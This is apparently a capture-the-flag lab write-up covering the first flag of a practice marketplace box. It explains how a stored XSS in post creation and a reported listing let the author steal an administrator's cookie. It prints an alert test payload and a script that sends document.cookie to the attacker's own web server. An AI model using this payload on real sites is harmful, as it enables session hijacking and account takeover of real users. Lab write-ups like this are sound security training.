The Marketplace

November 20, 2022

This box represents a marketplace for users to post and sell items on a market.

Flag 1

For the first part of the engagement, I looked around the webpage and quickly knew that the webpage was not that secure. I found that there was an admin report button that has automated accounts with administrator rights check when a posting is reported to see if its is appropriate for the marketplace.

With that in mind, I checked some of the posts and reported them. Although nothing too exciting happened, I thought if I could create a post and report it myself maybe the admins could share some information. Within the post creations, there is a persistent XSS vulnerability. I verified this by using the classic example

<script>alert(1);</script>

Once a user clicked on the post, that alert popped up.

I decided to run a web server from my attacker machine and craft this payload for a new posting on the website.

<script>fetch("http://<IP>:8000/"+document.cookie)</script>

Once that was posted inside a listing, I reported the listing and the attacker server would receive the administrator cookie.

I would then replace my cookie with the administrator cookie, refresh the page and I am then an admin.

PreviousLinux Privilege Escalation NextRootMe

Last updated 2 years ago